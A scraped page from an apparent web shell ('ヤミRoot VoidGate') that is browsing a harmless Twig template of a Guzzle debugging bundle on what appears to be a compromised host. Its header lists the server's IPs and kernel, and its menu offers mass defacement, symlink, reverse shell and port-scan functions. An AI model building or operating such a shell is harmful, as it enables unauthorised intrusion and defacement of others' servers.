ヤミRoot VoidGate
User / IP
:
216.73.216.33
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
api
/
vendor
/
csa
/
guzzle-bundle
/
src
/
Resources
/
views
/
Calls
/
Viewing: macros.html.twig
{% macro render_headers(headers, uri) %} <h4>Headers</h4> <table> <thead> <tr> <th scope="col" class="key">Header</th> <th scope="col">Value</th> </tr> </thead> {% for header, values in headers %} <tr> <td>{{ header }}</td> <td> {% if values|length > 1 %} <ul> {% for value in values %} <li>{{ value }}</li> {% endfor %} </ul> {% else %} {% if header == 'X-Debug-Token-Link' %} <a href="{{ values.0 }}" target="_blank">{{ values.0 }}</a> {% else %} {{ values.0 }} {% endif %} {% endif %} </td> </tr> {% endfor %} </table> {% endmacro %} {% macro render_body(body) %} {% if body is not empty %} <h4>Content</h4> {% set lang = csa_guzzle_detect_lang(body) %} <pre><code class="language-{{ lang }}">{{ body|csa_guzzle_pretty_print(lang) }}</code></pre> {% endif %} {% endmacro %} {% macro render_infos(info) %} {% if info and info.total_time %} <h4>Time</h4> {% set wait_time = info.namelookup_time + info.connect_time + info.redirect_time %} {% set process_time = info.total_time - wait_time %} <table> <thead> <tr> <th>Measure</th> <th>Duration</th> </tr> </thead> <tr> <td>Total</td> <td>{{ info.total_time|csa_guzzle_format_duration }}</td> </tr> <tr> <td>Name lookup</td> <td>{{ info.namelookup_time|csa_guzzle_format_duration }}</td> </tr> <tr> <td>Connection</td> <td>{{ info.connect_time|csa_guzzle_format_duration }}</td> </tr> {% if info.redirect_time %} <tr> <td>Redirect</td> <td>{{ info.redirect_time|csa_guzzle_format_duration }}</td> </tr> {% endif %} <tr> <td>Process</td> <td>{{ process_time | csa_guzzle_format_duration }}</td> </tr> </table> <div class="progress"> <div class="progress-bar progress-bar-warning" style="width: {{ wait_time/info.total_time * 100 }}%"> <span class="sr-only">Wait</span> </div> <div class="progress-bar progress-bar-success" style="width: {{ process_time/info.total_time * 100 }}%"> <span class="sr-only">Process</span> </div> </div> {% endif %} {% endmacro %} {% macro render_error(error) %} <h4>Message</h4> <p><pre>{{ error.message }}</pre></p> <h4>Origin</h4> <p><pre>{{ error.file }}({{ error.line }})</pre></p> <h4>Stack trace</h4> <pre><code class="language-text">{{error.trace|nl2br}}</code></pre> {% endmacro %} {% macro render_curl(curl) %} <h4>cURL</h4> <pre><code>{{ curl }}</code></pre> {% endmacro %}
Coded With 💗 by
0x6ick